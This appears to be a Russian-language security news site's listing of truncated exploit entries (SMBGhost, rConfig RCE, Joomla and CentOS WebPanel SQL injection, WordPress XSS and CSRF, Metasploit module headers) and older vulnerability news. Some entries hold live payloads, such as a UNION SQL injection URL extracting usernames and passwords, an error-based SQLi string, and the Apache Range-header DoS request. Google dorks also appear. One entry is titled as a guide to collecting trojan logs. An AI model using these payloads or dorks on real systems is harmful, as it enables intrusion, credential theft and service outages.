Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation # CVE-2020-0796
Windows SMBv3 LPE Exploit

## Authors
* Daniel García Gutiérrez ([@danigargu](https://twitter.com/danigargu))
* Manuel Blanco Parajón ([@dialluvioso_](https://twitter.com/dialluvioso_))
## References
* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da... Local // 05.04.2020 // Просмотров: 1513 // Рейтинг: - // Комментариев: -
«-----------------------------------»
rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution # Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution
# Exploit Author: vikingfr
# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com)
# Date: 2020-03-12
# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220
# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : https://www.rconfig.com/downloads/rconfig-3... Web apps // 28.03.2020 // Просмотров: 2791 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Broadcom Wi-Fi Devices - 'KR00K Information Disclosure # Kr00ker
#
# Experimetal KR00K PoC in python3 using scapy
#
# Description:
# This script is a simple experiment to exploit the KR00K vulnerability (CVE-2019-15126),
# that allows to decrypt some WPA2 CCMP data in vulnerable devices.
# More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP packets knowning:
# * the TK (128 bites all zero)
# * the Nonce (sent plaintext in packet header)
# * the Encrypted Data
#
# Where:
# * WPA2 AES-CCMP decryption --> AES(Nonce,TK) XOR... Remote // 25.03.2020 // Просмотров: 2957 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)# Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-02-21
# Exploit Author: Cem Onat Karagun of Diesec GmBH
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 80.0.3987.87
# Tested on: Windows x64 / Linux Debian x64 / MacOS
# CVE: CVE-2020-6404
# PoC Video: http://www.youtube.com/watch?v=tv5sDDwiWg8
# Description: https://bugs.chromium.org/p/chromium/issues/detail?id=1024256
Thread 35 "Chrome_InProcRe" received... dos,poc // 25.03.2020 // Просмотров: 3108 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection # Exploit Title: Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
# Dork: inurl:"index.php?option=com_hdwplayer"
# Date: 2020-03-23
# Exploit Author: qw3rTyTy
# Vendor Homepage: https://www.hdwplayer.com/
# Software Link: https://www.hdwplayer.com/download/
# Version: 4.2
# Tested on: Debian/Nginx/Joomla! 3.9.11
##########################################################################
#Vulnerability details
##########################################################################
File: components/com_hdwplayer/models/search... Web apps // 25.03.2020 // Просмотров: 5081 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting # Exploit Title: Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting
# Date: 2020-02-18
# Vendor Homepage: https://wpforms.com
# Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-wpforms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.8.2 and below
# CVE : CVE-2020-10385
1. Description
WPForms... Web apps // 25.03.2020 // Просмотров: 4282 // Рейтинг: - // Комментариев: -
«-----------------------------------»
VMWare Fusion - Local Privilege EscalationLocal Privilege Escalation via VMWare Fusion
Overview:
A directory traversal vulnerability in VMware Fusion's SUID binaries can allow
an attacker to run commands as the root user.
Tested Versions:
* VMware Fusion 10.1.3 (9472307) on macOS 10.13.6
* VMware Fusion 11.0.0 (10120384) on macOS 10.14.1
* VMware Fusion 11.0.2 (10952296) on macOS 10.14.1
* VMware Fusion 11.5.0 (14634996) on macOS 10.15.1
* VMware Fusion 11.5.1 (15018442) on macOS 10.15.1
Exercising:
1) Ensure the VMware Fusion services are... Local // 19.03.2020 // Просмотров: 4982 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost
Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip
## Usage
`./CVE-2020-0796.py servername`
This script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.
This contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol... dos,poc // 16.03.2020 // Просмотров: 2157 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection # Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
# Date: 2020-03-10
# Author: Milad Karimi
# Software Link:
# Version:
# Category : webapps
# Tested on: windows 10 , firefox
# CVE : CWE-89
# Dork: inurl:index.php?option=com_newsfeeds
index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
Example:
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15... Web apps // 14.03.2020 // Просмотров: 1787 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Centos WebPanel 7 - 'term' SQL Injection # Exploit Title: Centos WebPanel 7 - 'term' SQL Injection
# Google Dork: N/A
# Date: 2020-03-03
# Exploit Author: Berke YILMAZ
# Vendor Homepage: http://centos-webpanel.com/
# Software Link: http://centos-webpanel.com/
# Version: v6 - v7
# Tested on: Kali Linux - Windows 10
# CVE : N/A
# Type: Error Based SQL Injection
# Payload:
https://{DOMAIN_NAME}:2031/cwp_{SESSION_HASH}/admin/loader_ajax.php?ajax=dashboard&action=searchIn&term=a'
AND (SELECT 1197 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT
... Web apps // 14.03.2020 // Просмотров: 4084 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit) ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',
'Description' => %q{
This module exploits an issue in Google Chrome... Remote // 11.03.2020 // Просмотров: 1713 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)# Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
# Date: 2020-01-30
# Vendor Homepage: https://www.themeum.com/product/tutor-lms/
# Vendor Changelog: https://wordpress.org/plugins/tutor/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.2 and below
# CVE : CVE-2020-8615
# 1.... Web apps // 03.03.2020 // Просмотров: 3255 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
# Date: 2020-02-28
# Exploit Author: Photubias
# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688
# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys
# Vendor Homepage: https://www.microsoft.com
# Version: MS Exchange Server 2010 SP3 up to 2019 CU4
#... Remote // 03.03.2020 // Просмотров: 3404 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)# Exploit Title: Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)
# Description: Operator Can Change Role User Type to admin
# Date: 2020-02-26
# Exploit Author: Meisam Monsef
# Vendor Homepage: https://www.bdtask.com/business-live-chat-software.php
# Version: V-1.0
# Tested on: ubuntu
Exploit :
1 - please login or create account
2 - open exploit.html in browser
3 - change you user id input for Change Role User Type to admin
4 - fill input data (fname - lname - email)
5 -... Web apps // 01.03.2020 // Просмотров: 4378 // Рейтинг: - // Комментариев: -
«-----------------------------------»
WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass# Exploit Title: WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
# Discovery Date: 2020-02-02
# Public Disclosure Date: 2020-02-22
# Exploit Author: GeekHack
# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
# Software Link: https://github.com/cardgate/woocommerce/releases/tag/v3.1.15
# Version: Web apps // 25.02.2020 // Просмотров: 1671 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass# Exploit Title: Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
# Discovery Date: 2020-02-02
# Public Disclosure Date: 2020-02-22
# Exploit Author: GeekHack
# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
# Software Link: https://github.com/cardgate/magento2/releases/tag/v2.0.30
# Version: <= 2.0.30
# Tested on: Magento 2.3.4 + CardGate Payment Gateway Module 2.0.30
# CVE: CVE-2020-8818<?php /*
Description:
Lack of origin authentication ... Web apps // 25.02.2020 // Просмотров: 2992 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStager def initialize(info={}) super(update_info(info, 'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write", 'Description' => %q{
This module exploits a vulnerability that exists due to a lack... Remote // 24.02.2020 // Просмотров: 2164 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Android Binder - Use-After-Free##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super( update_info( info, {
'Name' => "Android Binder Use-After-Free Exploit",
'Description' => %q{
},
... Local // 24.02.2020 // Просмотров: 1045 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Diamorphine Rootkit - Signal Privilege Escalation##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Diamorphine Rootkit Signal Privilege Escalation',
... Local // 24.02.2020 // Просмотров: 1861 // Рейтинг: - // Комментариев: -
«-----------------------------------»
AMSS++ v 4.31 - 'id' SQL Injection# Title : AMSS++ v 4.31 - 'id' SQL Injection
# Author : indoushka
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)
# Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar
# Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
# CVE: N/A
# poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /modules/mail/main/maildetail... Web apps // 24.02.2020 // Просмотров: 2293 // Рейтинг: - // Комментариев: -
«-----------------------------------»
WordPress Core 5.3 - User Disclosure# Exploit Title : Wordpress 5.3 - User Disclosure
# Author: SajjadBnd
# Date: 2019-11-17
# Software Link: https://wordpress.org/download/
# version : wp < 5.3
# tested on : Ubunutu 18.04 / python 2.7
# CVE: N/A
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
import requests
import os
import re
import json
import sys
import urllib3
def clear():
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def Banner():
print('''
- Wordpress < 5.3 - User Enumeration
-... Web apps // 22.02.2020 // Просмотров: 1334 // Рейтинг: - // Комментариев: -
«-----------------------------------»
DBPower C300 HD Camera - Remote Configuration Disclosure# Exploit Title: DBPower C300 HD Camera - Remote Configuration Disclosure
# Date: 2020-02-19
# Author: Todor Donev
# Vendor: https://donev.eu/
# CVE: N/A
# Copyright 2020 (c) Todor Donev
#
# https://donev.eu/
# https://donev.eu/blog/dbpower-c300-multiple-vulnerabilities
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by... Web apps // 20.02.2020 // Просмотров: 1969 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Core FTP Lite 1.3 - Denial of Service (PoC)# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC) # Exploit Author: Berat Isler # Date: 2020-02-20 # Vendor Homepage: http://www.coreftp.com/ # Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437 # Version: Core FTP 1.3cBuild1437 # Tested on : Windows 7 32-bit # First step , Run exploit script, it will generate a new file with the name "mi.txt" # Then start Core FTP application and find the "username" textbox. # After that pate the content of "mi.txt" in... dos,poc // 20.02.2020 // Просмотров: 1631 // Рейтинг: - // Комментариев: -
«-----------------------------------»
WordPress Plugin WP Sitemap Page 1.6.2 - Persistent XSS# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
# Dork:N/A
# Date: 2020-02-17
# Exploit Author: UltraSecurityTeam
# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
# Vendor Homepage: UltraSec.Org
# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip
# Tested on: Windows/Linux
# Version: 1.6.2
.:: Plugin Description ::.
An easy way to add a sitemap on one of your pages becomes reality thanks to this... Web apps // 19.02.2020 // Просмотров: 1655 // Рейтинг: - // Комментариев: -
«-----------------------------------»
vBulletin 3.6.0 < 4.2.3 - 'ForumRunner' SQL Injection##################################################################################################
#Exploit Title : vBulletin <= 4.2.3 SQL Injection (CVE-2016-6195)
#Author : Manish Kishan Tanwar AKA error1046 (https://twitter.com/IndiShell1046)
#Date : 25/08/2015
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Tested At : Indishell Lab(originally developed by Dantalion)
##################################################################################################
... Web apps // 18.02.2020 // Просмотров: 1790 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Убийца Apache (обновление)20.08.2011 в листе рассылки Full Disclosure появился
скрипт, по заявлению автора, убивающий Apache начиная от самых старых
версий до самых новых. И он действительно работает. Скрипт killapache.pl запускает в несколько десятков потоков простой запроc:
HEAD / HTTP/1.1 Host: www.example.com Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,<...>,5-1299,5-1300 Accept-Encoding: gzip Connection: close
В ответ на такой запрос Apache для подсчета Content-Length
собирает в памяти длинный ответ из перекрывающихся... Уязвимости // 26.08.2011 // Просмотров: 7617 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Обнародован эксплоит для Премии РунетаКоманда RST/GHC, которая не так давно публиковала эксплоит для "одноклассники.ру", в своем блоге описала метод обхода ограничений на автоматическое голосование (накрутку) в известной системе "Народная премия рунета".
В представленной новости имеется ссылка на PoC инструменты, которые, по описанию авторов, были разработаны в 2007 году.
Подробности в ЖЖ Уязвимости // 10.11.2008 // Просмотров: 4390 // Рейтинг: - // Комментариев: -
«-----------------------------------»
QuickTime и iTunes вновь подвержены критической опасностиСамое популярное программное обеспечение компании Apple вновь
подвержено критической опасности, при том что компания менее недели
назад уже выпустила порцию из 9 патчей для этого софта. Как сообщили в
компании Symantec, обнаружившей опасность, о проблемах уже известно
злоумышленникам и они используют уязвимость. Впервые эксплоит
был замечен на сайте milw0rm.com. В его основе лежит уязвимость в
параметре <? quicktime type= ?>, указываемом для внедрения
видео-клипа в веб-страницу. Нынешние версии... Уязвимости // 20.09.2008 // Просмотров: 6478 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Эксплоит уязвимости Windows Vista.Как сообщает Ruben Santamarta в ОС Windows Vista обнаружена уязвимость, приводящая к DoS при обработке специально сформированного пакета SMB "WRITE_ANDX". Ошибка находится в "srv.sys" и "npfs.sys" при доступе к несуществующему адресу памяти. Для успешной эксплуатации со стороны неавторизованных пользователей требуется доступ по сети к интерфейсу, разрешающему NULL-сессии (например, "\LSARPC" для Vista). Теоретически уязвимость существует также в Windows 2000, XP, Server 2003, Server 2008. Автором... Уязвимости // 17.09.2008 // Просмотров: 7095 // Рейтинг: - // Комментариев: 2
«-----------------------------------»
Опубликован код эксплоита для атаки на DNS серверы
Две недели назад исследователь Дэн Каминский (Dan Kaminsky) объявил об обнаружении метода помещения не соответствующих реальности данных в кэш DNS сервера. Теоретическая возможность такой атаки,
вызванной недостаточным размером поля с идентификационным номером
запроса (под query id отдано 16 бит) в DNS пакете, была предсказана
ранее, но до сих пор относилась к разряду труднореализуемых на
практике. Рабочий код с демонстрацией подмены доменного имени и полное
описание новой техники DNS спуффинга... Уязвимости // 25.07.2008 // Просмотров: 6772 // Рейтинг: - // Комментариев: 1
«-----------------------------------»
Эксплойт уязвимости Access появился в Neosploit
У Microsoft появился дополнительный стимул выпустить патч для
уязвимости Access до следующего "вторника патчей". Symantec сообщает,
что эксплойт уязвимости баз данных был добавлен в хакерский
инструментарий Neosploit, известный простотой использования, что
позволяет разобраться в нем даже людям без специальных технических
знаний. В разделе Symantec ThreatCon говорится, что появление эксплойта
в составе Neosploit означает его скорое повсеместное распространение,
тогда как раньше ошибка использовалась... Уязвимости // 20.07.2008 // Просмотров: 4297 // Рейтинг: - // Комментариев: -
«-----------------------------------»
Как поиметь кучу отчётов с трояна | все способы захвата
[Предисловие] 1. Мне в ПМ приходили, да и сейчас приходят лс с
темами: "Как заливать шелл через гейт", "Как набрать отчётов", кто-то
не понимает одного, кто-то другого. На написание повлиял большинством
этот момент, писал я это для тех, кому это нужно. Те, кому это нах не
надо и охота под**ать, просто забудьте о написанном здесь и извините,
что у меня не получилось угодить вам - я собственно и не старался. 2. Здесь я собрал практически всё, о чём говорилось, о чём писалось по
теме. Новые... Взлом // 27.06.2008 // Просмотров: 15955 // Рейтинг: - // Комментариев: 2
«-----------------------------------»
PHP-инклюдинг в Mambo16 июня, 2008 Программа: Mambo 4.6.4, возможно другие версии. Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии includes/Cache/Lite/Output.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с... Уязвимости // 17.06.2008 // Просмотров: 7727 // Рейтинг: - // Комментариев: 1
«-----------------------------------» |